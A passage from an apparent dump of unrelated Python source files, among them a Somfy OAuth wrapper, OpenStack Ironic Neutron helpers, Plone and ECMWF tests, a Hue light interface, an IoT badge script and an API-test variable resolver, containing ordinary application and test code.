instance2 = RuleRegistry.Instance()
assert len(RuleRegistry.Instance().rules) > 0
assert instance1 is instance2
def test_register_instance():
instance1 = rule_registry
instance2 = RuleRegistry.Instance()
assert instance1 is instance2
|
"""API for Somfy bound to Open Peer Power OAuth."""
from __future__ import annotations
from asyncio import run_coroutine_threadsafe
from pymfy.api import somfy_api
from openpeerpower import config_entries, core
from openpeerpower.helpers import config_entry_oauth2_flow
class ConfigEntrySomfyApi(somfy_api.SomfyApi):
"""Provide a Somfy API tied into an OAuth2 based config entry."""
def __init__(
self,
opp: core.OpenPeerPower,
config_entry: config_entries.ConfigEntry,
implementation: config_entry_oauth2_flow.AbstractOAuth2Implementation,
) -> None:
"""Initialize the Config Entry Somfy API."""
self.opp = opp
self.config_entry = config_entry
self.session = config_entry_oauth2_flow.OAuth2Session(
opp, config_entry, implementation
)
super().__init__(None, None, token=self.session.token)
def refresh_tokens(
self,
) -> dict[str, str | int]:
"""Refresh and return new Somfy tokens using Open Peer Power OAuth2 session."""
run_coroutine_threadsafe(
self.session.async_ensure_token_valid(), self.opp.loop
).result()
return self.session.token
|
import json
import time
from enum import Enum
def current_time():
return int(round(time.time() * 1000))
def add_leading_zero(value):
if value >= 10:
return str(value)
return "0" + str(value)
def to_JSON(obj, sort_keys=True):
return json.dumps(obj, default=default_serializer,
sort_keys=sort_keys, indent=4)
def default_serializer(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, Enum):
serial = obj.value
return serial
return {x: obj.__dict__[x] for x in obj.__dict__ if not x.startswith("_")}
def write_size(data):
if data < 1100:
return str(data) + 'b'
if data < 1100000:
return str(round(data / 1000, 0)) + 'kb'
if data < 1100000000:
return str(round(data / 1000000, 2)) + 'mb'
if data < 1100000000000:
return str(round(data / 1000000000, 2)) + 'gb'
else:
return str(round(data / 1000000000, 2)) + 'tb'
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
|
import os
from setuptools import setup
version_file_path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'doctor', '_version.py')
with open(version_file_path, 'r') as version_file:
exec(compile(version_file.read(), version_file_path, 'exec'))
setup(
name=__name__,
version=__version__, # noqa -- flake8 should ignore this line
description='The doctor is in.',
url='https://github.com/noonat/doctor',
author='Nathan Ostgard',
author_email='no@nathanostgard.com',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
packages=['doctor'],
install_requires=[
'jsonschema>=2.5.1,<3.0.0',
'six>=1.9.0,<2.0.0',
],
extras_require={
'docs': [
'sphinx',
],
'tests': [
'flake8',
'mock',
'pytest',
'pytest-cov',
],
}
)
|
#
# Copyright 2014 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutronclient.common import exceptions as neutron_client_exc
from neutronclient.v2_0 import client as clientv20
from oslo.config import cfg
from ironic.api import acl
from ironic.common import exception
from ironic.common import keystone
from ironic.common import tftp
from ironic.openstack.common import log as logging
neutron_opts = [
cfg.StrOpt('url',
default='http://127.0.0.1:9696',
help='URL for connecting to neutron.'),
cfg.IntOpt('url_timeout',
default=30,
help='Timeout value for connecting to neutron in seconds.')
]
CONF = cfg.CONF
CONF.import_opt('my_ip', 'ironic.netconf')
CONF.register_opts(neutron_opts, group='neutron')
acl.register_opts(CONF)
LOG = logging.getLogger(__name__)
class NeutronAPI(object):
"""API for communicating to neutron 2.x API."""
def __init__(self, context):
self.context = context
self.client = None
params = {
'timeout': CONF.neutron.url_timeout,
'insecure': CONF.keystone_authtoken.insecure,
'ca_cert': CONF.keystone_authtoken.certfile,
}
if context.auth_token is None:
params['endpoint_url'] = (CONF.neutron.url or
keystone.get_service_url('neutron'))
params['username'] = CONF.keystone_authtoken.admin_user
params['tenant_name'] = CONF.keystone_authtoken.admin_tenant_name
params['password'] = CONF.keystone_authtoken.admin_password
params['auth_url'] = (CONF.keystone_authtoken.auth_uri or '')
else:
params['token'] = context.auth_token
params['endpoint_url'] = CONF.neutron.url
params['auth_strategy'] = None
self.client = clientv20.Client(**params)
def update_port_dhcp_opts(self, port_id, dhcp_options):
"""Update a port's attributes.
Update one or more DHCP options on the specified port.
For the relevant API spec, see
http://docs.openstack.org/api/openstack-network/2.0/content/extra-dhc-opt-ext-update.html # noqa
:param port_id: designate which port these attributes
will be applied to.
:param dhcp_options: this will be a list of dicts, e.g.
[{'opt_name': 'bootfile-name',
'opt_value': 'pxelinux.0'},
{'opt_name': 'server-ip-address',
'opt_value': '123.123.123.456'},
{'opt_name': 'tftp-server',
'opt_value': '123.123.123.123'}]
:raises: FailedToUpdateDHCPOptOnPort
"""
port_req_body = {'port': {'extra_dhcp_opts': dhcp_options}}
try:
self.client.update_port(port_id, port_req_body)
except neutron_client_exc.NeutronClientException:
LOG.exception(_("Failed to update Neutron port %s."), port_id)
raise exception.FailedToUpdateDHCPOptOnPort(port_id=port_id)
def update_port_address(self, port_id, address):
"""Update a port's mac address.
:param port_id: Neutron port id.
:param address: new MAC address.
:raises: FailedToUpdateMacOnPort
"""
port_req_body = {'port': {'mac_address': address}}
try:
self.client.update_port(port_id, port_req_body)
except neutron_client_exc.NeutronClientException:
LOG.exception(_("Failed to update MAC address on Neutron port %s."
), port_id)
raise exception.FailedToUpdateMacOnPort(port_id=port_id)
def get_node_vif_ids(task):
"""Get all Neutron VIF ids for a node.
This function does not handle multi node operations.
:param task: a TaskManager instance.
:returns: A dict of the Node's port UUIDs and their associated VIFs
"""
port_vifs = {}
for port in task.ports:
vif = port.extra.get('vif_port_id')
if vif:
port_vifs[port.uuid] = vif
return port_vifs
def update_neutron(task, pxe_bootfile_name):
"""Send or update the DHCP BOOT options to Neutron for this node."""
options = tftp.dhcp_options_for_instance(pxe_bootfile_name)
vifs = get_node_vif_ids(task)
if not vifs:
LOG.warning(_("No VIFs found for node %(node)s when attempting to "
"update Neutron DHCP BOOT options."),
{'node': task.node.uuid})
return
# TODO(deva): decouple instantiation of NeutronAPI from task.context.
# Try to use the user's task.context.auth_token, but if it
# is not present, fall back to a server-generated context.
# We don't need to recreate this in every method call.
api = NeutronAPI(task.context)
failures = []
for port_id, port_vif in vifs.iteritems():
try:
api.update_port_dhcp_opts(port_vif, options)
except exception.FailedToUpdateDHCPOptOnPort:
failures.append(port_id)
if failures:
if len(failures) == len(vifs):
raise exception.FailedToUpdateDHCPOptOnPort(_(
"Failed to set DHCP BOOT options for any port on node %s.") %
task.node.uuid)
else:
LOG.warning(_("Some errors were encountered when updating the "
"DHCP BOOT options for node %(node)s on the "
"following ports: %(ports)s."),
{'node': task.node.uuid, 'ports': failures})
|
import unittest2 as unittest
from Acquisition import aq_base
from plone.app.testing import TEST_USER_ID, setRoles
from collective.teamwork.tests.layers import DEFAULT_PROFILE_TESTING
from collective.teamwork.interfaces import IProjectContext, IWorkspaceContext
from fixtures import CreateContentFixtures
class UtilityTest(unittest.TestCase):
"""
Test functions of collective.teamwork.utils
"""
THEME = 'Sunburst Theme'
layer = DEFAULT_PROFILE_TESTING
def setUp(self):
self.portal = self.layer['portal']
setRoles(self.portal, TEST_USER_ID, ['Manager'])
CreateContentFixtures(self, self.layer).create()
def same(self, a, b):
return aq_base(a) is aq_base(b)
def test_get_projects(self):
from collective.teamwork.utils import get_projects, get_workspaces
from zope.component.hooks import getSite
assert self.same(getSite(), self.portal)
assert len(get_projects()) < len(get_workspaces())
assert len(get_projects()) == len(get_projects(self.portal))
assert len(get_projects()) == 2
isproject = lambda o: IProjectContext.providedBy(o)
for project in get_projects():
assert isproject(project)
found = get_projects()
for project in filter(isproject, self.portal.objectValues()):
assert project in found
def test_get_workspaces(self):
from collective.teamwork.utils import get_workspaces
project1 = self.portal['project1']
# test without context, without site
workspaces = get_workspaces()
assert len(workspaces) == 5
# test sort order, items closest to root first
assert self.same(workspaces[0], project1)
assert all(
map(lambda o: IWorkspaceContext.providedBy(o), workspaces)
)
# after first two workspaces, remainder are not projects
assert all(
map(lambda o: not IProjectContext.providedBy(o), workspaces[2:])
)
_path = lambda o: o.getPhysicalPath()
assert len(_path(workspaces[2])) > len(_path(workspaces[0]))
# test without context, passing site
found = get_workspaces()
assert len(found) == len(workspaces)
for workspace in found:
assert workspace in workspaces
# test with context
contained_workspaces = get_workspaces(project1)
assert len(contained_workspaces) == 3
def test_project_for(self):
from collective.teamwork.utils import project_for
path = 'project1/team1/stuff'
content = self.portal.unrestrictedTraverse(path)
project_expected = self.portal['project1']
assert self.same(project_for(content), project_expected)
assert self.same(IProjectContext(content), project_expected)
def test_workspace_for(self):
from collective.teamwork.utils import workspace_for
path = 'project1/team1/stuff'
content = self.portal.unrestrictedTraverse(path)
workspace_expected = self.portal['project1']['team1']
assert self.same(workspace_for(content), workspace_expected)
assert self.same(IWorkspaceContext(content), workspace_expected)
def test_parent_workspaces(self):
from collective.teamwork.utils import parent_workspaces
path = 'project1/team1/stuff'
content = self.portal.unrestrictedTraverse(path)
project_expected = self.portal['project1']
workspace_expected = project_expected['team1']
parents = parent_workspaces(content)
assert len(parents) == 2
assert self.same(parents[-1], workspace_expected)
assert self.same(parents[-2], project_expected)
def test_utility_view(self):
from collective.teamwork.utils import make_request
from collective.teamwork.utils import WorkspaceUtilityView
from collective.teamwork.utils import workspace_for, project_for
request = make_request()
path = 'project1/team1/stuff'
content = self.portal.unrestrictedTraverse(path)
view = WorkspaceUtilityView(content, request)
assert isinstance(view(), str) # calling returns string label
assert self.same(view.workspace(), workspace_for(content))
assert self.same(view.workspace(), IWorkspaceContext(content))
assert self.same(view.project(), project_for(content))
assert self.same(view.project(), IProjectContext(content))
|
"""
Na relação de associação um objeto pode existir sem o outro,
ma existe a possibilidade de um deles usar uma instância do outro.
"""
class Bombeiro():
def __init__(self, nome):
self.__nome = nome
self.__ferramenta = None
@property
def nome(self):
return (self.__nome + '_getter').upper()
@nome.setter
def nome(self, valor):
self.__nome = valor + '_setter'
@property
def ferramenta(self):
return self.__ferramenta
@ferramenta.setter
def ferramenta(self, _ferramenta):
self.__ferramenta = _ferramenta
class Veiculo():
combust = 'gasolina'
def __init__(self, tipo, placa):
self.__tipo = tipo
self._placa = placa
@property
def tipo(self):
return self.__tipo
@tipo.setter
def tipo(self, _tipo):
self.__tipo = _tipo.upper()
bombeiro_1 = Bombeiro('Jackson')
print(bombeiro_1.nome)
bombeiro_1.nome = 'João'
print(bombeiro_1.nome)
bombeiro_1.ferramenta = Veiculo('camihão', 'orh6375')
# ↑ criando um objeto da classe veículo associado ao objeto bombeiro
print(bombeiro_1.ferramenta._placa)
bombeiro_1.ferramenta.combust = 'água'
print(bombeiro_1.ferramenta.combust)
print(bombeiro_1.ferramenta.tipo)
print(Veiculo.combust)
|
from typing import Any, Dict, Union
from tealprint import TealPrint
from tealprint.teallevel import TealLevel
from ...core.entities.color import Color
from ..interface import Interface
from ..moods import Mood
from .api import Api
class HueInterface(Interface):
INVALID_ID = -1
def __init__(self, name: str, type: str, action: str) -> None:
super().__init__(name)
self._id = HueInterface.INVALID_ID
self.type = type
self.action = action
@property
def id(self) -> int:
if self._id == HueInterface.INVALID_ID:
self._id = self._get_id()
if self._id != HueInterface.INVALID_ID:
TealPrint.info(f"ℹ Found id {self._id} for HueInterface {self.name}")
else:
TealPrint.warning(f"⚠ Could not find id for HueInterface {self.name}")
return self._id
@id.setter
def id(self, id: int):
self._id = id
def _get_id(self) -> int:
# Get all interfaces of type
all = Api.get(f"/{self.type}")
if not all:
TealPrint.warning(f"⚠ Could not get all /{self.type} for {self.name}")
return HueInterface.INVALID_ID
for id_str, object in all.items():
if "name" in object:
name = str(object["name"])
if name.lower() == self.name.lower():
return int(id_str)
return HueInterface.INVALID_ID
def _get_data(self) -> Union[Dict[str, Any], None]:
return Api.get(f"/{self.type}/{self.id}")
def _get_state(self) -> Union[Dict[str, Any], None]:
data = self._get_data()
if data and self.action in data:
state = data[self.action]
if isinstance(state, dict):
return state
def turn_on(self) -> None:
self._put({"on": True})
def turn_off(self) -> None:
self._put({"on": False})
def toggle(self) -> None:
new_state = not self.is_on()
self._put({"on": new_state})
def is_on(self) -> bool:
state = self._get_state()
if state and "on" in state:
return state["on"]
return False
def dim(self, value: Union[float, int], transition_time: float = 1) -> None:
normalized_value = Interface.normalize_dim(value)
normalized_time = Interface.normalize_transition_time(transition_time)
self._put(
{
"on": True,
"bri": normalized_value,
"transitiontime": normalized_time,
}
)
def color(self, color: Color, transition_time: float = 1) -> None:
normalized_time = Interface.normalize_transition_time(transition_time)
body = {
"on": True,
"transitiontime": normalized_time,
}
if color.x and color.y:
body["xy"] = [color.x, color.y]
elif color.hue:
body["hue"] = color.hue
elif color.saturation:
body["sat"] = color.saturation
elif color.temperature:
body["ct"] = color.temperature
else:
TealPrint.warning(f"⚠🚦 Didn't specify any color when calling color()")
return
self._put(body)
def mood(self, mood: Mood) -> None:
self.dim(mood.brightness)
self.color(mood.color)
def _put(self, body: Dict[str, Any]) -> None:
url = f"/{self.type}/{self.id}/{self.action}"
TealPrint.verbose(f"📞 Hue API: {url}, body: {body}")
Api.put(url, body)
|
# (C) Copyright 2020- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
from __future__ import absolute_import, unicode_literals
import os
import pytest
from servicelib.context.service import ServiceContext
from servicelib.core import Request
def test_trackers_vary_per_request(servicelib_yaml):
c1 = ServiceContext("some-service", "/some/dir", None, Request())
c2 = ServiceContext("some-service", "/some/dir", None, Request())
assert c1.tracker != c2.tracker
def test_create_temp_file(context):
fname = context.create_temp_file()
assert os.access(fname, os.F_OK)
def test_temp_files_are_removed(context):
fname = context.create_temp_file()
context.cleanup()
assert not os.access(fname, os.F_OK)
def test_handle_errors_in_temp_file_cleanup(context):
fname = context.create_temp_file()
os.unlink(fname)
context.cleanup()
assert not os.access(fname, os.F_OK)
def test_create_result(context):
r = context.create_result("text/plain").as_dict()
assert "location" in r
assert "contentType" in r
assert "contentLength" in r
def test_get_data_downloads_only_once(context):
location = {"location": "https://www.ecmwf.int/"}
one = context.get_data(location)
assert one.stat()
two = context.get_data(location)
assert two.stat()
assert one == two
def test_get_data_files_persist(context):
fname = context.get_data({"location": "https://www.ecmwf.int/"})
context.cleanup()
assert fname.stat()
def test_download_unsupported_url_schemes(context):
with pytest.raises(Exception) as exc:
context.get_data({"location": "ftp://localhost/whatever"})
assert str(exc.value) == "ftp://localhost/whatever: Unsupported URL scheme 'ftp'"
def test_download_errors(context):
with pytest.raises(Exception):
context.get_data({"location": "http://no-such-host"})
|
a = [1,2,3,4,5,6]
def reverse(l:list):
# 首尾不停的交换
left =0
right = len(l)-1
while left<right:
l[left],l[right] = l[right],l[left]
left+=1
right-=1
return l
result = reverse(a)
print(result) |
#encoding: utf-8
from django.shortcuts import render
from django.http import JsonResponse
from .models import Client
from base import constants
from base.decorators import login_required
@login_required
def lists(request):
if request.is_ajax():
result = [client.as_dict(True) for client in Client.ok_objects.all()]
return JsonResponse({'status' : constants.HTTP_STATUS_OK, 'result' : result})
else:
return render(request, 'agent/list.html')
@login_required
def delete(request):
id = request.POST.get('id')
Client.delete(id)
return JsonResponse({'status' : constants.HTTP_STATUS_OK})
|
import json
import network
import time
import math
import umqtt.simple as simple
import machine
import random
from util import Config, wait_network
sta_if = network.WLAN(network.STA_IF)
conf = Config('ibmiot')
if not conf.data:
random.seed(time.time())
conf.data = {
'orgID': 'quickstart', # <<< org_id
'deviceType': 'badge2018',
'deviceID': ''.join('{:02X}'.format(c) for c in sta_if.config('mac')),
'user': 'use-token-auth',
'authToken': 'badge{}'.format(str(random.random()).split('.')[1]),
}
conf.save()
clientID = 'd:' + conf.data['orgID'] + ':' + conf.data['deviceType'] + ':' + conf.data['deviceID']
broker = conf.data['orgID'] + '.messaging.internetofthings.ibmcloud.com'
statusTopic = b'iot-2/evt/status/fmt/json'
signalTopic = b'iot-2/evt/signal/fmt/json'
ledCommandTopic = b'iot-2/cmd/led/fmt/json'
irCommandTopic = b'iot-2/cmd/ir/fmt/json'
if conf.data['orgID'] == 'quickstart':
c = simple.MQTTClient(clientID, broker, ssl=False)
print('Quickstart URL: https://quickstart.internetofthings.ibmcloud.com/#/device/{}/sensor/'.format(
conf.data['deviceID']))
else:
c = simple.MQTTClient(clientID, broker,
user=conf.data['user'], password=conf.data['authToken'], ssl=True)
# LED
led_red = machine.Pin(17, machine.Pin.OUT, value=0)
#led_blue = machine.Pin(16, machine.Pin.OUT, value=0)
# IR
rx = machine.RMT(rmt_mode=machine.RMT.RX,
channel=4, clk_div=80, pin=machine.Pin(26), mem_block_num=4)
rx.config(filter_en=True, filter_ticks_thresh=100, idle_threshold=30000, rx_buf_size=4000)
tx = machine.RMT(rmt_mode=machine.RMT.TX,
channel=0, clk_div=80, pin=machine.Pin(16), mem_block_num=4)
tx.config()
def sub_cb(topic, msg):
obj = json.loads(msg)
print((topic, msg, obj))
if topic == ledCommandTopic:
led_cb(obj)
elif topic == irCommandTopic:
ir_cb(obj)
else:
print('Unknown topic: {}'.format(topic))
def led_cb(obj):
if obj['d']['target'] == 'red':
led = led_red
elif obj['d']['target'] == 'blue':
led = led_blue
else:
print('Unknown target')
return
if obj['d']['action'] == 'on':
led.value(1)
elif obj['d']['action'] == 'off':
led.value(0)
elif obj['d']['action'] == 'toggle':
led.value(1 if led.value() == 0 else 0)
else:
print('Unknown action')
return
def ir_cb(obj):
if obj['d']['action'] == 'record':
print('Recording IR signal..')
cmd = rx.receive()
rcmd = list(map(lambda x: [[x[0][0], 1 - x[0][1]], [x[1][0], 1 - x[1][1]]], cmd))
print(rcmd)
c.publish(signalTopic, json.dumps({'d': {'cmd': rcmd}}))
elif obj['d']['action'] == 'send':
tx.send(obj['d']['cmd'])
def sineVal(minValue, maxValue, duration, count):
sineValue = math.sin(2.0 * math.pi * count / duration) * (maxValue - minValue) / 2.0
return '{:.2f}'.format(sineValue)
def main():
c.set_callback(sub_cb)
if not wait_network():
print('Cannot connect WiFi')
raise Exception('Cannot connect WiFi')
c.connect()
if conf.data['orgID'] != 'quickstart':
c.subscribe(ledCommandTopic)
c.subscribe(irCommandTopic)
print('Connected, waiting for event ({})'.format(conf.data['deviceID']))
status = {'d': {'sine':{}}}
count = 0
try:
while True:
status['d']['sine'] = sineVal(-1.0, 1.0, 16, count)
count += 1
c.publish(statusTopic, json.dumps(status))
time.sleep_ms(10000)
#c.wait_msg()
c.check_msg()
finally:
c.disconnect()
print('Disonnected')
|
import re
import time
import random
import datetime
from faker import Faker
# ----------------------------------------------------------------------
# # Do something
# ----------------------------------------------------------------------
def str_list(_str):
_str = _str.strip("['").strip("']")
_list = _str.replace("', '", "|")
return _list.split('|')
def set_global(set_global_vars, response_text):
# 请求返回结果
# response_text = {"headers": {"Host": "666666"}}
# set_global_vars = [{'name': 'test', 'query': ['headers', 'Host']}]
global_vars = dict()
new_temp_suite_params = dict()
temp_suite_params = dict()
if set_global_vars == None:
return False
if set_global_vars and isinstance(set_global_vars, list):
for set_global_var in set_global_vars:
if isinstance(set_global_var, dict) and isinstance(
set_global_var.get('name'),
str) and set_global_var.get('name'):
name = set_global_var.get('name')
query = set_global_var.get('query')
if query and isinstance(query, list):
query = replace_global_var_for_list(
init_var_list=query, global_var_dic=global_vars)
# print(query)
value = dict_get(response_text, query)
global_vars[name] = str(value) if value else value
new_temp_suite_params[name] = str(value) if value else value
temp_suite_params.update(new_temp_suite_params)
# temp_suite_params -> 全局变量操作
return temp_suite_params
def replace_global_var_for_list(init_var_list,
global_var_dic,
global_var_regex='\${.*?}',
match2key_sub_string_start_index=2,
match2key_sub_string_end_index=-1):
if not isinstance(init_var_list, list):
raise TypeError('init_var_list must be list!')
if len(init_var_list) < 1:
raise ValueError('init_var_list should not be empty!')
replaced_var = []
for init_var_str in init_var_list:
replaced_str = replace_global_var_for_str(
init_var_str=init_var_str, global_var_dic=global_var_dic)
replaced_var.append(replaced_str)
return replaced_var
def replace_global_var_for_str(init_var_str,
global_var_dic,
global_var_regex='\${.*?}',
match2key_sub_string_start_index=2,
match2key_sub_string_end_index=-1):
if not isinstance(init_var_str, str):
raise TypeError('init_var_str must be str!')
if not isinstance(global_var_dic, dict):
raise TypeError('global_var_dic must be dict!')
if not isinstance(global_var_regex, str):
raise TypeError('global_var_regex must be str!')
if not isinstance(match2key_sub_string_start_index, int):
raise TypeError('match2key_sub_string_start_index must be int!')
if not isinstance(match2key_sub_string_end_index, int):
raise TypeError('match2key_sub_string_end_index must be int!')
regex_pattern = re.compile(global_var_regex)
def global_var_repl(match_obj):
start_index = match2key_sub_string_start_index
end_index = match2key_sub_string_end_index
match_value = global_var_dic.get(
match_obj.group()[start_index:end_index])
# 将一些数字类型转成str,否则re.sub会报错, match_value可能是0!
match_value = str(
match_value) if match_value is not None else match_value
return match_value if match_value else match_obj.group()
replaced_var = re.sub(pattern=regex_pattern,
string=init_var_str,
repl=global_var_repl)
return replaced_var
def is_slice_expression(expression):
if re.match("(-?\d+)?:(-?\d+)?", expression):
return True
else:
return False
def can_convert_to_int(input):
try:
int(input)
return True
except BaseException:
return False
def is_specific_search_by_dict_value(expression):
if re.match(r'(.)+=(.)+\.(.)+', expression):
return True
else:
return False
def dict_get(dic, locators, default=None):
if not isinstance(dic, dict):
if isinstance(dic, str) and len(locators) == 1:
if is_slice_expression(locators[0]):
slice_indexes = locators[0].split(':')
start_index = int(
slice_indexes[0]) if slice_indexes[0] else None
end_index = int(
slice_indexes[-1]) if slice_indexes[-1] else None
value = dic[start_index:end_index]
return value
else:
# 如果不满足切片规则,就直接进行正则匹配
match_obj = re.search(locators[0], dic)
return match_obj.group() if match_obj else None
return dic
if dic == {} or len(locators) < 1:
return str(dic) # 用于后续 re.search
value = None
for locator in locators:
locator = locator.replace(' ', '').replace('\n', '').replace('\t', '')
if not type(value) in [dict, list] and isinstance(
locator, str) and not is_slice_expression(locator):
try:
value = dic[locator]
except KeyError:
return default
continue
if isinstance(value, str) and is_slice_expression(locator):
try:
slice_indexes = locator.split(':')
start_index = int(
slice_indexes[0]) if slice_indexes[0] else None
end_index = int(
slice_indexes[-1]) if slice_indexes[-1] else None
value = value[start_index:end_index]
except KeyError:
return default
continue
if isinstance(value, dict):
try:
value = dict_get(value, [locator])
except KeyError:
return default
continue
if isinstance(value, list) and len(value) > 0:
if can_convert_to_int(locator):
try:
value = value[int(locator)]
except IndexError:
return default
continue
elif is_specific_search_by_dict_value(locator) and all(
[isinstance(v, dict) for v in value]):
# e.g.
# locator: email=michael(.)+.first_name
# 含义为 取 (key = email, value = michael开头) 的那个 dict的 key 为 first_name 的value
first_equal_index = locator.index('=')
last_dot_index = locator.rindex('.')
matched_key_re = locator[:first_equal_index] # 字典中存在满足的正则条件的键
# matched_key对应的值需要满足的正则条件
matched_value_re = locator[first_equal_index +
1:last_dot_index]
# 满足正则条件的字典中待取的值的键
needed_value_key = locator[last_dot_index + 1:]
for dic in value:
for k, v in dic.items():
if re.match(matched_key_re, str(k)) and re.match(
matched_value_re, str(v)):
needed_value = dic.get(needed_value_key)
value = needed_value
break
else:
continue
break
else:
return default
continue
elif locator == 'random':
try:
value = value[random.randint(0, len(value) - 1)]
except IndexError:
return default
continue
return value
def resolve_faker_var(
init_faker_var,
faker_var_regex=r'\$faker{([a-z]{2}_[A-Z]{2})?\.?(.*?)(\(.*?\))}'):
re_global_var = re.compile(faker_var_regex)
def faker_var_repl(match_obj):
locale_index = match_obj.group(1)
method_name = match_obj.group(2)
_args = match_obj.group(3)
_faker = Faker(locale_index)
_kwargs = str_args_2_dict(_args) if '=' in _args else {}
match_value = getattr(_faker, method_name)(**_kwargs)
# 将一些数字类型转成str,否则re.sub会报错, match_value可能是0!
match_value = str(
match_value) if match_value is not None else match_value
return match_value if match_value else match_obj.group()
resolved_var = re.sub(pattern=re_global_var,
string=init_faker_var,
repl=faker_var_repl)
return resolved_var
def str_args_2_dict(args: str) -> dict:
args = args.replace(' ', '')
args = args.replace('(', '')
args = args.replace(')', '')
args_list = args.split(',')
dic = {}
for param in args_list:
equal_sign_index = param.index('=')
key = param[:equal_sign_index]
value = param[equal_sign_index + 1:]
if '<int>' in value:
value = int(value[value.find('<int>') + 5:])
elif '<float>' in value:
value = float(value[value.find('<float>') + 7:])
dic[key] = value
return dic
def resolve_func_var(init_func_var,
func_var_regex=r'\$func{([a-zA-Z0-9_]*)(\(.*?\))}'):
re_global_var = re.compile(func_var_regex)
def func_var_repl(match_obj):
method_name = match_obj.group(1)
_args = match_obj.group(2)
_func = Func()
_kwargs = str_args_2_dict(_args) if '=' in _args else {}
match_value = getattr(_func, method_name)(**_kwargs)
# 将一些数字类型转成str,否则re.sub会报错, match_value可能是0!
match_value = str(
match_value) if match_value is not None else match_value
return match_value if match_value else match_obj.group()
resolved_var = re.sub(pattern=re_global_var,
string=init_func_var,
repl=func_var_repl)
return resolved_var
class Func:
def __init__(self):
pass
def get_milli_second_timestamp(self):
now_timetuple = time.time()
return int(round(now_timetuple * 1000)) # 毫秒级时间戳
def get_micro_second_timestamp(self):
now_timetuple = time.time()
return int(round(now_timetuple * 1000000)) # 微秒级时间戳
def get_second_timestamp(self):
now_timetuple = time.time()
return int(now_timetuple) # 秒级时间戳
def get_current_time(self, format_str="%Y-%m-%d %H:%M:%S"):
return datetime.datetime.now().strftime(format_str)
def replace_global_var_for_str(init_var_str,
global_var_dic,
global_var_regex='\${.*?}',
match2key_sub_string_start_index=2,
match2key_sub_string_end_index=-1):
if not isinstance(init_var_str, str):
raise TypeError('init_var_str must be str!')
if not isinstance(global_var_dic, dict):
raise TypeError('global_var_dic must be dict!')
if not isinstance(global_var_regex, str):
raise TypeError('global_var_regex must be str!')
if not isinstance(match2key_sub_string_start_index, int):
raise TypeError('match2key_sub_string_start_index must be int!')
if not isinstance(match2key_sub_string_end_index, int):
raise TypeError('match2key_sub_string_end_index must be int!')
regex_pattern = re.compile(global_var_regex)
def global_var_repl(match_obj):
start_index = match2key_sub_string_start_index
end_index = match2key_sub_string_end_index
match_value = global_var_dic.get(
match_obj.group()[start_index:end_index])
# 将一些数字类型转成str,否则re.sub会报错, match_value可能是0!
match_value = str(
match_value) if match_value is not None else match_value
return match_value if match_value else match_obj.group()
replaced_var = re.sub(pattern=regex_pattern,
string=init_var_str,
repl=global_var_repl)
return replaced_var
def resolve_int_var(init_int_str, int_var_regex='\'?<int>([0-9]+)</int>\'?'):
re_int_var = re.compile(int_var_regex)
def int_var_repl(match_obj):
return match_obj.group(1) if match_obj.group(1) else match_obj.group()
resolved_var = re.sub(pattern=re_int_var,
string=init_int_str,
repl=int_var_repl)
return resolved_var
|
"""
Commonmark with header level extension
"""
from CommonMark.blocks import Parser
from CommonMark.render.html import HtmlRenderer
class SteakRenderer(HtmlRenderer):
"""
Custom renderer
"""
def __init__(self, *args, **kwargs):
"""
Set options
"""
self._headerleveloffset = kwargs.pop("headerleveloffset", 0)
super(SteakRenderer, self).__init__(*args, **kwargs)
def heading(self, node, entering):
"""
Override header level
"""
node.level = min(node.level + self._headerleveloffset, 6)
super(SteakRenderer, self).heading(node, entering)
def render(source, headerleveloffset=0):
"""
Render markdown with Steak Renderer
"""
parser = Parser()
ast = parser.parse(source)
renderer = SteakRenderer(headerleveloffset=headerleveloffset)
return renderer.render(ast)
|
from typing import Dict
from classifier.classes.core.Model import Model
from classifier.classes.modules.images.cnn_img.ModelImagesCNN import ModelImagesCNN
from classifier.classes.modules.images.cnn_rnn_img.ModelImagesCNNRNN import ModelImagesCNNRNN
from classifier.classes.modules.images.pre_trained_cnn.ModelPreTrainedCNN import ModelPreTrainedCNN
from classifier.classes.modules.multimodal.vistempnet.ModelVisTempNet import ModelVisTempNet
from classifier.classes.modules.multimodal.vistextnet.ModelVisTextNet import ModelVisTextNet
from classifier.classes.modules.sequences.cnn_rnn_seq.ModelSequencesCNNRNN import ModelSequencesCNNRNN
from classifier.classes.modules.sequences.cnn_seq.ModelSequencesCNN import ModelSequencesCNN
from classifier.classes.modules.sequences.rnn.ModelRNN import ModelRNN
from classifier.classes.modules.text.transformer.ModelTransformer import ModelTransformer
class ModelFactory:
models_map = {
"vistextnet": ModelVisTextNet,
"vistempnet": ModelVisTempNet,
"rnn": ModelRNN,
"cnn_seq": ModelSequencesCNN,
"cnn_rnn_seq": ModelSequencesCNNRNN,
"cnn_img": ModelImagesCNN,
"cnn_rnn_img": ModelImagesCNNRNN,
